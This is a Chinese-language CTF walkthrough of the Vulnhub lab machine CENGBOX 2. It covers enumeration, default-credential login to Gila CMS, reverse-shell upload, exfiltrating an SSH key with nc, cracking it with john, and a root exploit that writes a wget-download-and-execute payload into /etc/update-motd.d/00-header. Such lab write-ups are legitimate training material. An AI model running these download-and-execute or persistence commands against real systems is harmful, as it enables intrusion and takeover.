zoukankan      html  css  js  c++  java
  • Vulnhub实战靶场:CENGBOX: 2

    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/cengbox-1,475/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

     二、靶场攻略

    1、nmap -sP --min-hostgroup 1024 --min-parallelism 1024  10.10.114.0/24,获得靶场真实ip

    收集启动的服务信息,发现开启了21、80、22,FTP服务未进行认证有个note.txt文件

     登录FTP服务,下载查看文件

    得到提示,网站用的默认密码,有两个人名Kevin,Aaron可能是账户名,还有要转向的域名

     

     2、修改HOTS访问80端口网站,收集信息,直接访问域名网站,没任何提示

    使用gobuster vhost -u ceng-company.vm -w /usr/share/wordlists/dirb/big.txt,对子域名进行爆破,发现一个403的界面

    访问直接,提示没网站

    再次编辑hots文件,访问403提示了

     对网站目录进行爆破:gobuster dir -u admin.ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,得到一个gila跳转301目录

     

     终于访问到网站,知道是Gila cms搭建的 

     3、直接在目录后加上admin,跳转到后台登录界面

     账号密码,需要根据FTP下载的文件提示,提示只改了Kevin的设置,登录用户名提示用的email格式的,所以平凑尝试用kevin@ceng-company.vm,密码admin,登陆成功

     4、进入文件管理界面,发现/tmp目录中,httaccess禁止了php执行,直接删除之后,上传msf生成的反射shell的文件,成功上传getshell

     5、接下来就是提权了,sudo -l,发现不需要密码就可以执行的脚本

     查看脚本

    使用sudo -u执行脚本之后,运行python交互shell的命令,得到交互shell,查看账户已经为swartz账户

     

     6、切换到另一个账户,发现user.txt,这是这个系列靶场的低权限账户的flag文件,不过现在无法权限,查看目录发现.ssh隐藏目录

     进入.ssh目录,发现ssh密钥文件

     使用nc将密钥发送到kali中

     kali里监听端口,成功得到密钥信息

     kali里,新建id_rsa文件,将得到的私钥信息保存,之后使用ssh2john.py将保存的私钥信息,转化成可使用john破解的信息,之后使用john进行破解,得到私钥密码legend

     使用ssh利用得到的密钥,登录账户,将密钥文件权限改为600否则无法使用,输入密码成功登录

     得到user.txt里的flag

     7、该提权到root了,find / -type f -perm -g+rwx 2>/dev/null,寻找可利用的文件,查找到这几个文件,查找之后知道是ssh登录时的欢迎信息

    首先,在msf中,使用web_delivery,设置好一个web脚本传递,使用msf生成的脚本传递命令

     在ssh登录到mitnick账户之后,执行生成的命令,然后退出ssh

    在msf中已经得到这个账户权限的shell,然后在msf这个shell中,执行命令echo "wget -qO cHiawSTV --no-check-certificate http://10.10.114.191:8080/xhSTya2IiJuj3fJ; chmod +x cHiawSTV; ./cHiawSTV& disown" >> /etc/update-motd.d/00-header,将刚才执行的web传递命令,写入到00-header的ssh连接提示文件中

     

     再次使用ssh登录,在msf中,顺利得到root权限的shell,拿到flag

     

     完

  • 相关阅读:
    CodeForces 510C Fox And Names (拓扑排序)
    Codeforces 1153D Serval and Rooted Tree (简单树形DP)
    HDU 6437 Problem L.Videos (最大费用)【费用流】
    Luogu P3381 (模板题) 最小费用最大流
    Codeforces 741B Arpa's weak amphitheater and Mehrdad's valuable Hoses (并查集+分组背包)
    Codeforces 1144F Graph Without Long Directed Paths (DFS染色+构造)
    HDU 2204 Eddy's 爱好 (容斥原理)
    Codeforces 939E Maximize! (三分 || 尺取)
    Codeforces 938D. Buy a Ticket (最短路+建图)
    CodeForces 959E Mahmoud and Ehab and the xor-MST (MST+找规律)
  • 原文地址:https://www.cnblogs.com/sym945/p/14292239.html
Copyright © 2011-2022 走看看